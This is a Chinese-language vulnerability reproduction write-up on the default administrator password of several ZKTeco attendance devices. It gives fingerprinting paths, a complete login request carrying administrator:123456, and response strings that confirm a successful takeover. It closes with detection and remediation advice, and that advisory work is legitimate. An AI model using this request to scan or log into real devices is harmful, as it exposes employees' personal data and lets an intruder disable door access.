中控多款考勤机默认口令漏洞复现
中控多款考勤机默认口令漏洞复现
0x00 漏洞概述
中控智慧(ZKTeco)多款考勤机提供基于 Web 的管理界面,其内置 Web 服务在响应头中带有 ZK Web Server 标识。该系列设备存在默认口令问题:出厂内置管理员账户 administrator,初始口令为 123456。攻击者无需认证前序条件,直接向登录校验接口提交该默认凭据即可进入系统,进而泄露大量员工信息、篡改系统配置、使门禁失效并随时开关门,直接威胁业务安全;攻击者还可在系统中增加隐藏用户,实现对该设备的长期控制。
0x01 影响范围
受影响对象为中控智慧(ZKTeco)多款内置 Web 管理界面的考勤设备。该问题无对应公开 CVE 编号,具体受影响型号与版本未能核实;结合默认口令类问题的普遍特征推断,凡部署后未修改出厂口令的设备均受影响,该判断为推断。设备可通过如下特征识别:HTTP 响应头中出现 ZK Web Server,且站点包含 /csl/login 登录页或 /csl/check 校验接口路径。管理界面一旦暴露于不可信网络且口令保持出厂状态,即处于可被直接登录的风险之中。
0x02 漏洞分析
该系列考勤机的 Web 管理界面由内置的 ZK Web Server 提供,登录页面位于 /csl/login,登录校验由 /csl/check 接口完成,凭据通过 application/x-www-form-urlencoded 表单提交,参数为 username 与 userpwd。问题核心在于凭据基线:设备预置 administrator 账户,出厂口令为 123456,首次部署不强制改密。考勤设备往往内嵌员工姓名、工号、打卡记录等个人信息,且常与门禁、闸机联动,管理权限一旦旁落,波及的是人身与数据两条风险线。口令校验通过后,服务端返回管理主界面的相关内容特征。该登录校验接口存在三类可区分的成功响应形态:其一是响应体包含 css/Secutime.css 样式引用;其二是响应体包含 self.location.href='/' 跳转脚本且带有 Server: ZK Web Server 标识;其三是响应体包含 /csl/start_tmp 路径。任一形态与 200 状态码同时出现,即可确认目标口令仍为出厂值。攻击者据此可批量识别未改密的设备并直接接管。
0x03 利用链与请求包
利用链为单步请求:向 /csl/check 提交默认凭据 administrator:123456。以下主机地址为示意地址。
POST /csl/check HTTP/1.1
Host: 192.0.2.15
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Origin: http://192.0.2.15
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xm l,application/xm l;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.0.2.15/csl/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
username=administrator&userpwd=123456成功判定:响应状态码为 200,且响应体满足以下任一条件——包含 css/Secutime.css;包含 self.location.href='/' 且包含 Server: ZK Web Server;包含 /csl/start_tmp。命中即说明设备仍使用出厂口令。攻击者凭该凭据登录后,可导出大量员工信息,篡改系统配置,使门禁失效、随时开关门,并通过增加隐藏用户长期控制设备。
上述请求形态与参数含义如下:username 对应登录用户名,userpwd 对应登录口令,/csl/check 为登录校验接口。
0x04 检测与修复建议
检测方面:一是排查资产清单,确认考勤设备管理界面是否暴露于公网或跨安全域可达,并依据响应头中的 ZK Web Server 标识梳理暴露面;二是审计设备访问日志,关注 administrator 账户的登录来源是否异常,重点排查非常用网段与非常规时段的成功登录;三是可在授权维护窗口内按上文请求包核对口令基线,确认是否仍为出厂状态;四是核查设备内用户列表与门禁策略,确认是否存在未经批准的新增账户或开关门配置变更。
修复建议:
1. 立即修改默认管理员密码,新密码应包含大小写字母、数字和特殊字符,且长度不小于12位。
2. 禁止将管理界面暴露到公网,通过防火墙限制访问来源。
3. 谨慎启用自定义工具等高权限功能,限制可执行代码的权限。
4. 启用操作日志审计,记录所有管理操作和 API 调用。
5. 定期检查用户账户和 API 密钥的使用情况。
0x05 参考资料
- 暂无公开参考链接

Wayyt 1小时前
最新评论